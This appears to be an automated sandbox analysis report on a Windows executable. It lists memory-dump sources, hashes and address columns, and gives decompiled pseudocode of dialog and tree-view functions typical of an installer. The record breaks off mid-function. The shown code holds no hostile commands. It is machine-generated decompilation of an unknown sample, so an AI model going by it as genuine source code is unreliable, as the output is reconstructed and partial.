                                                                                                                                    0x00407279
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407279
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407404
                                                                                                                                    0x00407404
                                                                                                                                    0x00407404
                                                                                                                                    0x00407409
                                                                                                                                    0x00407412
                                                                                                                                    0x0040741b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040741b
                                                                                                                                    0x00407428
                                                                                                                                    0x00407428
                                                                                                                                    0x0040742b
                                                                                                                                    0x00407432
                                                                                                                                    0x00407435
                                                                                                                                    0x00000000
                                                                                                                                    0x00407258
                                                                                                                                    0x004071d8
                                                                                                                                    0x004071da
                                                                                                                                    0x004071da
                                                                                                                                    0x004071de
                                                                                                                                    0x004071e1
                                                                                                                                    0x004071e2
                                                                                                                                    0x004071e2
                                                                                                                                    0x00000000
                                                                                                                                    0x004071da
                                                                                                                                    0x0040714e
                                                                                                                                    0x00407154
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 032b97d2c0dd3ad8b399f85795982be5409d932e9076961fc27651e281f7ab59
                                                                                                                                    • Instruction ID: 9d2be59318aa5463414b09db0228cb89f43db07e183c4c7463e91a949da24ee6
                                                                                                                                    • Opcode Fuzzy Hash: 032b97d2c0dd3ad8b399f85795982be5409d932e9076961fc27651e281f7ab59
                                                                                                                                    • Instruction Fuzzy Hash: 3AC15B71E042598BCF14CF64C4905EEBBB2FF98314F25826AD8567B380D738A942CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404BF9, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00404BF9(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t208;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f468;
				_v28 =  *0x42f434 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f43d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404B47(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a87c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a890;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a87c = 0;
								 *0x42a890 = 0;
								 *0x42f4a0 = 0;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L91;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404BC7();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a890;
									_t206 =  *0x42f468;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f46c <= 0) {
										L86:
										InvalidateRect(_v8, 0, 1);
										_t208 =  *0x42ebfc; // 0x671d5f
										if( *((intOrPtr*)(_t208 + 0x10)) != 0) {
											E00404B02(0x3ff, 0xfffffffb, E00404B1A(5));
										}
										goto L88;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f46c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a890);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L91;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4a0 = _a4;
					_v20 = 2;
					 *0x42a890 = GlobalAlloc(0x40,  *0x42f46c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a884 =  *0x42a884 | 0xffffffff;
					_v16 = _t264;
					 *0x42a88c = SetWindowLongA(_v8, 0xfffffffc, E00405201);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a87c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a87c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E00406188(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004041F4(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004041F4(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f46c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a890 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a890 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a890 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f46c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404229(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404229(_v12);
								L91:
								return E0040425B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                                                    0x00404c17
                                                                                                                                    0x00404c1f
                                                                                                                                    0x00404c27
                                                                                                                                    0x00404c2d
                                                                                                                                    0x00404c45
                                                                                                                                    0x00404c48
                                                                                                                                    0x00404c49
                                                                                                                                    0x00404e76
                                                                                                                                    0x00404e7d
                                                                                                                                    0x00404e91
                                                                                                                                    0x00404e7f
                                                                                                                                    0x00404e81
                                                                                                                                    0x00404e84
                                                                                                                                    0x00404e85
                                                                                                                                    0x00404e8c
                                                                                                                                    0x00404e8c
                                                                                                                                    0x00404e9d
                                                                                                                                    0x00404eab
                                                                                                                                    0x00404eae
                                                                                                                                    0x00404ec4
                                                                                                                                    0x00404f39
                                                                                                                                    0x00404f3c
                                                                                                                                    0x00404f3e
                                                                                                                                    0x00404f48
                                                                                                                                    0x00404f56
                                                                                                                                    0x00404f56
                                                                                                                                    0x00404f58
                                                                                                                                    0x00404f62
                                                                                                                                    0x00404f68
                                                                                                                                    0x00404f6b
                                                                                                                                    0x00404f6e
                                                                                                                                    0x00404f89
                                                                                                                                    0x00404f70
                                                                                                                                    0x00404f7a
                                                                                                                                    0x00404f7a
                                                                                                                                    0x00404f6e
                                                                                                                                    0x00404f62
                                                                                                                                    0x00000000
                                                                                                                                    0x00404f3c
                                                                                                                                    0x00404ec9
                                                                                                                                    0x00404ed4
                                                                                                                                    0x00404ed9
                                                                                                                                    0x00404ee0
                                                                                                                                    0x00404ee5
                                                                                                                                    0x00404ee9
                                                                                                                                    0x00404ef4
                                                                                                                                    0x00404ef4
                                                                                                                                    0x00404ef8
                                                                                                                                    0x00404efc
                                                                                                                                    0x00404f00
                                                                                                                                    0x00404f13
                                                                                                                                    0x00404f02
                                                                                                                                    0x00404f02
                                                                                                                                    0x00404f09
                                                                                                                                    0x00404f0f
                                                                                                                                    0x00404f0b
                                                                                                                                    0x00404f0b
                                                                                                                                    0x00404f0b
                                                                                                                                    0x00404f09
                                                                                                                                    0x00404f17
                                                                                                                                    0x00404f19
                                                                                                                                    0x00404f2c
                                                                                                                                    0x00404f2f
                                                                                                                                    0x00404f32
                                                                                                                                    0x00404f32
                                                                                                                                    0x00404efc
                                                                                                                                    0x00000000
                                                                                                                                    0x00404ee9
                                                                                                                                    0x00404ecb
                                                                                                                                    0x00404ed2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404f8c
                                                                                                                                    0x00404f8c
                                                                                                                                    0x00404f93
                                                                                                                                    0x00405004
                                                                                                                                    0x0040500c
                                                                                                                                    0x00405014
                                                                                                                                    0x00405014
                                                                                                                                    0x0040501d
                                                                                                                                    0x0040501f
                                                                                                                                    0x00405026
                                                                                                                                    0x00405029
                                                                                                                                    0x00405029
                                                                                                                                    0x0040502f
                                                                                                                                    0x00405036
                                                                                                                                    0x00405039
                                                                                                                                    0x00405039
                                                                                                                                    0x0040503f
                                                                                                                                    0x00405045
                                                                                                                                    0x0040504b
                                                                                                                                    0x0040504b
                                                                                                                                    0x00405058
                                                                                                                                    0x004051ae
                                                                                                                                    0x004051b5
                                                                                                                                    0x004051d2
                                                                                                                                    0x004051d8
                                                                                                                                    0x004051ea
                                                                                                                                    0x004051ea
                                                                                                                                    0x00000000
                                                                                                                                    0x0040505e
                                                                                                                                    0x00405060
                                                                                                                                    0x00405065
                                                                                                                                    0x0040506a
                                                                                                                                    0x0040506f
                                                                                                                                    0x00405071
                                                                                                                                    0x00405071
                                                                                                                                    0x00405072
                                                                                                                                    0x00405073
                                                                                                                                    0x00405075
                                                                                                                                    0x00405075
                                                                                                                                    0x0040507d
                                                                                                                                    0x004050be
                                                                                                                                    0x004050c0
                                                                                                                                    0x004050d0
                                                                                                                                    0x004050d3
                                                                                                                                    0x004050d8
                                                                                                                                    0x004050df
                                                                                                                                    0x004050e2
                                                                                                                                    0x00405184
                                                                                                                                    0x0040518a
                                                                                                                                    0x00405190
                                                                                                                                    0x00405198
                                                                                                                                    0x004051a9
                                                                                                                                    0x004051a9
                                                                                                                                    0x00000000
                                                                                                                                    0x00405198
                                                                                                                                    0x004050e8
                                                                                                                                    0x004050eb
                                                                                                                                    0x004050f1
                                                                                                                                    0x004050f6
                                                                                                                                    0x004050f8
                                                                                                                                    0x004050fa
                                                                                                                                    0x00405100
                                                                                                                                    0x00405107
                                                                                                                                    0x0040510c
                                                                                                                                    0x00405113
                                                                                                                                    0x00405116
                                                                                                                                    0x00405116
                                                                                                                                    0x0040511d
                                                                                                                                    0x00405129
                                                                                                                                    0x0040512d
                                                                                                                                    0x0040512f
                                                                                                                                    0x0040512f
                                                                                                                                    0x0040511f
                                                                                                                                    0x00405121
                                                                                                                                    0x00405121
                                                                                                                                    0x0040514f
                                                                                                                                    0x0040515b
                                                                                                                                    0x0040516a
                                                                                                                                    0x0040516a
                                                                                                                                    0x0040516c
                                                                                                                                    0x0040516f
                                                                                                                                    0x00405178
                                                                                                                                    0x00000000
                                                                                                                                    0x0040507f
                                                                                                                                    0x0040508a
                                                                                                                                    0x0040508d
                                                                                                                                    0x00405092
                                                                                                                                    0x00405094
                                                                                                                                    0x00405098
                                                                                                                                    0x004050a8
                                                                                                                                    0x004050b2
                                                                                                                                    0x004050b4
                                                                                                                                    0x004050b7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040509a
                                                                                                                                    0x0040509a
                                                                                                                                    0x004050a0
                                                                                                                                    0x004050a2
                                                                                                                                    0x004050a2
                                                                                                                                    0x004050a3
                                                                                                                                    0x004050a4
                                                                                                                                    0x00000000
                                                                                                                                    0x0040509a
                                                                                                                                    0x0040507d
                                                                                                                                    0x00405058
                                                                                                                                    0x00404f9b
                                                                                                                                    0x00000000
                                                                                                                                    0x00404fb1
                                                                                                                                    0x00404fbb
                                                                                                                                    0x00404fc0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404fd2
                                                                                                                                    0x00404fd7
                                                                                                                                    0x00404fe3
                                                                                                                                    0x00404fe3
                                                                                                                                    0x00404fe5
                                                                                                                                    0x00404ff4
                                                                                                                                    0x00404ff6
                                                                                                                                    0x00404ffa
                                                                                                                                    0x00404ffd
                                                                                                                                    0x00000000
                                                                                                                                    0x00404ffd
                                                                                                                                    0x00404f9b
                                                                                                                                    0x00404c4f
                                                                                                                                    0x00404c52
                                                                                                                                    0x00404c55
                                                                                                                                    0x00404c65
                                                                                                                                    0x00404c78
                                                                                                                                    0x00404c83
                                                                                                                                    0x00404c89
                                                                                                                                    0x00404c97
                                                                                                                                    0x00404caa
                                                                                                                                    0x00404caf
                                                                                                                                    0x00404cba
                                                                                                                                    0x00404cc3
                                                                                                                                    0x00404cd9
                                                                                                                                    0x00404ce9
                                                                                                                                    0x00404cf5
                                                                                                                                    0x00404cf5
                                                                                                                                    0x00404cfa
                                                                                                                                    0x00404d00
                                                                                                                                    0x00404d02
                                                                                                                                    0x00404d05
                                                                                                                                    0x00404d0a
                                                                                                                                    0x00404d0f
                                                                                                                                    0x00404d11
                                                                                                                                    0x00404d11
                                                                                                                                    0x00404d31
                                                                                                                                    0x00404d31
                                                                                                                                    0x00404d33
                                                                                                                                    0x00404d34
                                                                                                                                    0x00404d39
                                                                                                                                    0x00404d3f
                                                                                                                                    0x00404d43
                                                                                                                                    0x00404d48
                                                                                                                                    0x00404d50
                                                                                                                                    0x00404d54
                                                                                                                                    0x00404d59
                                                                                                                                    0x00404d5e
                                                                                                                                    0x00404d66
                                                                                                                                    0x00404d69
                                                                                                                                    0x00404e38
                                                                                                                                    0x00404e4b
                                                                                                                                    0x00000000
                                                                                                                                    0x00404d6f
                                                                                                                                    0x00404d72
                                                                                                                                    0x00404d75
                                                                                                                                    0x00404d78
                                                                                                                                    0x00404d78
                                                                                                                                    0x00404d7d
                                                                                                                                    0x00404d86
                                                                                                                                    0x00404d89
                                                                                                                                    0x00404d8d
                                                                                                                                    0x00404d90
                                                                                                                                    0x00404d93
                                                                                                                                    0x00404d9c
                                                                                                                                    0x00404da5
                                                                                                                                    0x00404da8
                                                                                                                                    0x00404dab
                                                                                                                                    0x00404dae
                                                                                                                                    0x00404dec
                                                                                                                                    0x00404e17
                                                                                                                                    0x00404dee
                                                                                                                                    0x00404dfd
                                                                                                                                    0x00404dfd
                                                                                                                                    0x00404db0
                                                                                                                                    0x00404db3
                                                                                                                                    0x00404dc1
                                                                                                                                    0x00404dcb
                                                                                                                                    0x00404dd3
                                                                                                                                    0x00404dda
                                                                                                                                    0x00404de5
                                                                                                                                    0x00404de5
                                                                                                                                    0x00404dae
                                                                                                                                    0x00404e1d
                                                                                                                                    0x00404e1e
                                                                                                                                    0x00404e2a
                                                                                                                                    0x00404e2a
                                                                                                                                    0x00404e36
                                                                                                                                    0x00404e51
                                                                                                                                    0x00404e54
                                                                                                                                    0x00404e71
                                                                                                                                    0x00000000
                                                                                                                                    0x00404e56
                                                                                                                                    0x00404e5b
                                                                                                                                    0x00404e64
                                                                                                                                    0x004051ec
                                                                                                                                    0x004051fe
                                                                                                                                    0x004051fe
                                                                                                                                    0x00404e54
                                                                                                                                    0x00000000
                                                                                                                                    0x00404e36
                                                                                                                                    0x00404d69

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32 ref: 00404C10
                                                                                                                                    • GetDlgItem.USER32 ref: 00404C1D
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C6C
                                                                                                                                    • LoadImageA.USER32 ref: 00404C83
                                                                                                                                    • SetWindowLongA.USER32 ref: 00404C9D
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CAF
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404CC3
                                                                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404CD9
                                                                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404CE5
                                                                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404CF5
                                                                                                                                    • DeleteObject.GDI32(00000110), ref: 00404CFA
                                                                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404D25
                                                                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404D31
                                                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404DCB
                                                                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404DFB
                                                                                                                                      • Part of subcall function 00404229: SendMessageA.USER32(00000028,?,00000001,00404059), ref: 00404237
                                                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404E0F
                                                                                                                                    • GetWindowLongA.USER32 ref: 00404E3D
                                                                                                                                    • SetWindowLongA.USER32 ref: 00404E4B
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404E5B
                                                                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404F56
                                                                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404FBB
                                                                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404FD0
                                                                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404FF4
                                                                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00405014
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00405029
                                                                                                                                    • GlobalFree.KERNEL32 ref: 00405039
                                                                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004050B2
                                                                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 0040515B
                                                                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040516A
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040518A
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004051D8
                                                                                                                                    • GetDlgItem.USER32 ref: 004051E3
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004051EA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 2564846305-813528018
                                                                                                                                    • Opcode ID: e792091cbd0f5f6b38c64874a5f59de6389cc8b9065b320a4a01fe7e62073599
                                                                                                                                    • Instruction ID: 26b408d2065fced8b3aa27b558790843a3ecfca43f1cc7f5e0793415f51e586f
                                                                                                                                    • Opcode Fuzzy Hash: e792091cbd0f5f6b38c64874a5f59de6389cc8b9065b320a4a01fe7e62073599
                                                                                                                                    • Instruction Fuzzy Hash: 79025CB0A00209AFDB20DF54CD45AAE7BB9FB44314F50813AFA14BA2E1C7789D52CF58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403D20, Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			E00403D20(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a880 = _t35;
					if(_t116 == 0x110) {
						 *0x42f428 = _t126;
						 *0x42a894 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429860 = _t92;
						E004041F4(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08);
						 *0x42ebec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a880 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f460;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E00404240(0x40b);
						while(1) {
							_t37 =  *0x42a880;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x42f464;
							if(_t39 ==  *0x42f464) {
								E0040140B(1);
							}
							__eflags =  *0x42ebec - _t134; // 0x1
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x42f464; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E00406188(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004041F4(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004041F4(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004041F4(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4cc - _t134;
							_v32 = _t49;
							if( *0x42f4cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E00404216(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429860, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
